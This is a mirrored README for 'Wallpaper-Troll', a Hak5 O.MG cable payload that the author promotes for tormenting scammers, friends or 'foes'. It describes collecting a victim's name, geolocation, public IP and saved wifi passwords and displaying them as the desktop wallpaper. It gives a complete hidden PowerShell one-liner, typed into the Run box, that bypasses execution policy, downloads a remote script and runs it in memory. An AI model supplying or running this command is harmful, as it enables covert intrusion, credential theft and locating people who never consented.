mirror of https://github.com/hak5/omg-payloads.git
100 lines
2.9 KiB
Markdown
100 lines
2.9 KiB
Markdown
|
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||
|
|
||
|
<!-- TABLE OF CONTENTS -->
|
||
|
<details>
|
||
|
<summary>Table of Contents</summary>
|
||
|
<ol>
|
||
|
<li><a href="#Description">Description</a></li>
|
||
|
<li><a href="#getting-started">Getting Started</a></li>
|
||
|
<li><a href="#Contributing">Contributing</a></li>
|
||
|
<li><a href="#Version-History">Version History</a></li>
|
||
|
<li><a href="#Contact">Contact</a></li>
|
||
|
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||
|
</ol>
|
||
|
</details>
|
||
|
|
||
|
# Wallpaper-Troll
|
||
|
|
||
|
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
|
||
|
|
||
|
## Description
|
||
|
|
||
|
This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords
|
||
|
This information will be saved to a file that is then converted to a .BMP image
|
||
|
That image will be saved to their desktop and saved as their wallpaper
|
||
|
Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file
|
||
|
|
||
|
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Wallpaper-Troll/wp-troll.jpg)
|
||
|
|
||
|
## Getting Started
|
||
|
|
||
|
### Dependencies
|
||
|
|
||
|
* Windows 10,11
|
||
|
|
||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||
|
|
||
|
### Executing program
|
||
|
|
||
|
* Plug in your device
|
||
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||
|
```
|
||
|
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-Wallpaper-Troll/Wallpaper-Troll.ps1?dl=1?dl=1; invoke-expression $pl
|
||
|
```
|
||
|
|
||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||
|
|
||
|
## Contributing
|
||
|
|
||
|
All contributors names will be listed here
|
||
|
|
||
|
I am Jakoby
|
||
|
|
||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||
|
|
||
|
## Version History
|
||
|
|
||
|
* 0.1
|
||
|
* Initial Release
|
||
|
|
||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||
|
|
||
|
<!-- CONTACT -->
|
||
|
## Contact
|
||
|
|
||
|
<div><h2>I am Jakoby</h2></div>
|
||
|
<p><br/>
|
||
|
|
||
|
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||
|
|
||
|
<a href="https://github.com/I-Am-Jakoby/">
|
||
|
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||
|
</a>
|
||
|
|
||
|
<a href="https://www.instagram.com/i_am_jakoby/">
|
||
|
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||
|
</a>
|
||
|
|
||
|
<a href="https://twitter.com/I_Am_Jakoby/">
|
||
|
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||
|
</a>
|
||
|
|
||
|
<a href="https://www.youtube.com/c/IamJakoby/">
|
||
|
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||
|
</a>
|
||
|
|
||
|
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll)
|
||
|
</p>
|
||
|
|
||
|
|
||
|
|
||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||
|
|
||
|
<!-- ACKNOWLEDGMENTS -->
|
||
|
## Acknowledgments
|
||
|
|
||
|
* [Hak5](https://hak5.org/)
|
||
|
* [MG](https://github.com/OMG-MG)
|
||
|
|
||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|